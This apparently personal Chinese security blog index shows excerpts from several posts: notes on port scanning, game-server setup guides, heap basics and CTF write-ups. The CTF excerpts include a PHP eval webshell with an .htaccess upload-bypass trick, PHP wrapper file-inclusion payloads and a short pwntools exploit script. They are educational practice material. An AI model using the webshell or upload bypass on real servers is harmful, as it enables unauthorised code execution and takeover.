信息收集之端口扫描
导语最近在看软考信息安全工程师的教材,看到信息收集这块儿,结合之前的靶机渗透经验,觉得自己掌握的不是很牢靠,有必要再总结一下。
端口扫描的几种类型完全连接扫描利用tcp/ip的三次握手机制,如果完成了三次握手建立了一个连接,就说明确此端口开放,否则视为关闭。
半连接扫描简化一点的完全连接扫描,只要前两次握手成了就行。
SYN扫描发送连接请求,看主机的回应,如果反悔了ACK信息则认为是开放,如果是RESET则认为关闭
ID头信息扫描要求借助一台基本没有网络活动的主机B。先由A主机向B发ping,关注返回的报文的ID(书上是这么写的,我实在不知道tcp的id是搁哪儿的,暂时理解成SEQ吧)。如果均匀+1,说明B主机确实没什么网络活动,在目前阶段只与A有交流。然后A伪造一个由B发出的请求连接数据包给C,如果C开放了,就会回SYN,而B会再和C交流,因此再给ping返回的ID就不是加一而是加几,而如果C不开放,就会回RESET给B,B一看RESET直接丢了,依旧和ping返回,所以ID只加一。
隐蔽扫描是绕IDS防火墙和监视系统的方法
SYN|ACK扫描直接发SYN|ACK,也就是第二次握手的 ...
雨中冒险2服务器搭建
导语简单记录一下雨中冒险2服务器的搭建
法1-dockergithub上有一个项目
直接随选一个linux系统,然后用对应分包管理工具装好他的依赖,运行就完事了。
这个项目是在docker里的linux用wine模拟windows环境来搭建ror2服务器。
实际上ror2的开发商貌似只开发了windows环境下的服务器,所以其实在各种意义上,这个用wine的docker都不是很稳定,在我和朋友们联机的过程中也深受其害,果断弃用。
法2-windows用windows来整就稳定一点,但也没有那么稳定,虽然实际上是我朋友网络的问题……
这里我们用到的是steamcmd
在你的云服务商哪里选一个windowsserver,然后把steamcmd放进去,管理员运行之,等他自己安装,安装完了会显示
然后你随便建个文件夹,用来放你的ror2的服务器文件,接下来输入
force_install_dir="C:\ror2" # 这里换你自己设置的文件夹login anonymousapp_update 1180760 validate
他就会下载(和你再linux上安装csgo服 ...
BUU刷题日记-[ZJCTF 2019]NiZhuanSiWei
[ZJCTF 2019]NiZhuanSiWei逆转思维
先审计。用get接受text,file和password三个参数,通过file_get_contents()来读取以text参数为名的文件,如果文件的内容是”welcome to the zjctf”,就echo这个文件,然后判断file中是否有flag字符串,如果没有,就include他,并且将password传来的内容反序列化,在echo之。
因此,首先要做的是将”welcome to the zjctf”写入一个文件,这里使用了php的data伪协议
?text=data://text/plain,welcome to the zjctf
然后在include file的地方有一个注释提示include useless.php,首先用file伪协议看看
?text=data://text/plain,welcome to the zjctf&file=php://filter/read ...
BUU刷题日记-你传你m呢
你传你m呢开局让传马。随便写个一句话
<?php @eval($_POST['pass']);?>
直接传php会彦宏获水
bp里改Content-type也不行,必须给后缀变成jpg
上传成功后,再上传一个htaccess,内容为
AddType application/x-httpd-php .jpg
用bp把Content-type改成Image/jpeg
然后再传个马
即可连接
也可以用
<FilesMatch "4.jpg"> SetHandler application/x-httpd-php </FilesMatch>
来进行匹配地解析
总结.htaccess
.htaccess是一个纯文本文件,它里面存放着Apache服务器配置相关的指令。.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件 ...
堆基础知识
导语入门堆溢出之前,首先要对堆有个基础的了解
堆的简单介绍可能经常听到这个说法,栈内存由os操作,堆地址由程序员操作。这个说法有一定的可取之处。
堆管理器处于用户程序与内核中间,主要做以下工作
响应用户的申请内存请求,向操作系统申请内存,然后将其返回给用户程序。同时,为了保持内存管理的高效性,内核一般都会预先分配很大的一块连续的内存,然后让堆管理器通过某种算法管理这块内存。只有当出现了堆空间不足的情况,堆管理器才会再次与操作系统进行交互。
管理用户所释放的内存。一般来说,用户释放的内存并不是直接返还给操作系统的,而是由堆管理器进行管理。这些释放的内存可以来响应用户新申请的内存的请求。
Linux 中早期的堆分配与回收由 Doug Lea 实现,但是多线程共享堆的内存空间,在申请的时候需要加锁,这就导致了多线程对堆的操作效率很低。在glibc-2.3.x只有,目前的堆由ptmalloc2管理。
需要注意的是,在内存分配与使用的过程中,Linux 有这样的一个基本内存管理思想, 只有当真正访问一个地址的时候,系统才会建立虚拟页面与物理页面的映射关系 。 所以虽然操作系统已经给程序分配了 ...
hgame2022_wp
导语pillar’s ‘杭电hgame 2022 write up
miscweek1欢迎欢迎!热烈欢迎!题目描述:关注“奇安信技术研究院”微信公众号,发送 HelloHGAME2022 获得flag
我就不多bb
这个压缩包有点麻烦题目描述:这个压缩包,它真的可以打开吗?
在压缩包信息里可以看到提示6位数字密码,ARCHPR暴破之
解压,按照README,利用字典暴破之
解压,README提示If you don’t like to spend time compressing files, just stores them.开始以为是zip伪加密,010打开发现不是。然后发现文件内README和外面的README的CRC32值一样,即内外一致。加上提示说存储,所以以存储格式压缩README。
打开后是一张图,010editor发现尾部藏了一个zip
提取出来,又是zip,且需要密码,没提示,这里就该是zip伪加密了,用010editor将标志位改为0,解压得到flag
好康的流量题目描述:总所周知 饭卡是个LSP并十分喜欢向其他人推销他的涩图 让我们去悄悄康康他发了什 ...
MC服务器building
导语想和兄弟萌一起砍砍MC吗?想增加服务器运维经验吗?想学习一下MC的插件编写吗?毫无疑问,自己开个MC服务器是在合适不过了。
服务器性能要求MC对于算力、内存的要求不是很大,但也需要一点,在Minecraft Wiki里显示了硬件要求。
需求
玩家
CPU
内存
硬盘
[隐藏]注释
最低配置
2-4
Intel Core 2 Duo 或 AMD Athlon 64 x2
2GB
至少150MB用于储存世界
确保至少拥有一个低ping的互联网连接(比如DSL或缆线连接)。
建议配置
2-6
Intel Core 2 Duo 或 AMD Athlon 64 x2
3GB
至少200MB用于储存世界
确保至少拥有一个低ping的互联网连接(比如DSL或缆线连接)。
实际上在各个云服务器运营商哪里,一个这样的服务器都不是很贵(PS:如果你之前没买过)(PPS:甚至可以去tb之类的地方买到更便宜的)。
配置服务器服务器核心种类MC目前主流的服务器主要分为官服、水桶服(CraftBukkit)、水龙头服(spigot)和paper服(paperspi ...
BUU刷题日记-ciscn-2019-n-8
导语pillar的pwn刷题日记
ciscn_2019_n_8首先checksec
开了Canary NX和PIE 是一个32位的程序
运行一下看看
IDA打开康康
看到有scanf,和一串var,这个var点进去可以看到是一个全局变量,每个成员都是dword,加上他的注释,可以认为var是一个int数组。
同时我们看到逻辑,当var[13]的QWARD是17即可getshell。由此写exp
from pwn import *sh=remote("node4.buuoj.cn",27187)payload="AAAA"*13+p64(17) # 因为是QWORD所以要用p64sh.sendline(payload)sh.interactive()
flag{04aaad59-8795-4aa9-bd50-4a25f8888134}
但是每台搞明白这个v4和v5是咋用的,scanf里int参数是干嘛的呀?
BUU刷题日记-[HCTF 2018]admin
导语这也能偷鸡?
[HCTF 2018]admin偷鸡看到有个login,看到题目是admin,于是先随便试试密码,试了123,直接登进去了(啊这
但是感觉应该还有芝士点
分析这个webapp有login和register两个功能
随便注册一个账号并登陆,发现没有如之前一样显示flag,页面里有个注释说you are not admin,所以是登陆了admin即可获取flag。
在change password里可以看到一个github
但是发现403木得了,看了别人的writeup,是源码
#!/usr/bin/env python# -*- coding:utf-8 -*- from flask import Flask, render_template, url_for, flash, request, redirect, session, make_responsefrom flask_login import logout_user, LoginManager, current_user, login_userfrom app import app, dbfrom c ...
vnctf2021wp
导语习惯了,没有这个导语就不舒服,虽然其实这个导语也没什么能导的 XD
mischappynewyear两个hint第一个是这个网站https://www.dcode.fr/tools-list#symbols第二个是用stegpy。题目有这个可以在第一个hint的网站里找到,分别是Chinese Code和Sheikah Language,解出来是f87840bdddcc01e4解开压缩包,得到happynewyear.png然后使用stegpy,发现密码不知道,也没有提示。然后就有点不会了后来看了https://app.yinxiang.com/fx/7967a020-f748-4090-8398-03afd5146a40 的wp,暴破得之stegpy库里原有的lsb.py改成lsb2.py
def read_message(self, password=None): msg = decode_message(self.data) if password: try: salt = bytes(msg[:16]) ...